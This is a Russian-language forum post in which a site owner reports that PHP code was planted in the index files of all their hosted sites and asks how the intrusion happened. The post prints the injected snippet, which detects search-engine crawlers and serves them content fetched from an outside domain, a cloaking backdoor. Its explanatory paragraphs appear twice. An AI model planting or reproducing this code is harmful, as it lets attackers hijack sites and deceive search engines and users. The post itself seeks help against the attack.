Каким-то образом вчера нам в индексные файлы засунули это (во все наши сайты на этом хостинге):
Очевидно, подсовывает поисковикам код с указанного сайта. Поиск находит несколько сайтов, где подобный скрипт некорректно срабатывает и выявляется ошибка.
Главный вопрос - как это сделали? Вряд-ли получили доступ к фтп, но пароль уже сменили. На сайте есть пхпбб последней версии. Взломанные сайты из поиска размещены на самых разных хостингах, так что не обязательно с ним связано.
Код |
---|
<?php $h = gethostbyaddr($_SERVER["REMOTE_ADDR"]); if (eregi("google", $h) || eregi("yandex", $h) || eregi("msn", $h) || eregi("aol", $h)) { foreach ($_GET as $key=>$val) $str .= '&'.urlencode($key).'='.urlencode($val); echo file_get_contents('http://kotovasia.com/6/naeb.php?host='.$_SERVER['SERVER_NAME'].$str); } ?> |
Очевидно, подсовывает поисковикам код с указанного сайта. Поиск находит несколько сайтов, где подобный скрипт некорректно срабатывает и выявляется ошибка.
Главный вопрос - как это сделали? Вряд-ли получили доступ к фтп, но пароль уже сменили. На сайте есть пхпбб последней версии. Взломанные сайты из поиска размещены на самых разных хостингах, так что не обязательно с ним связано.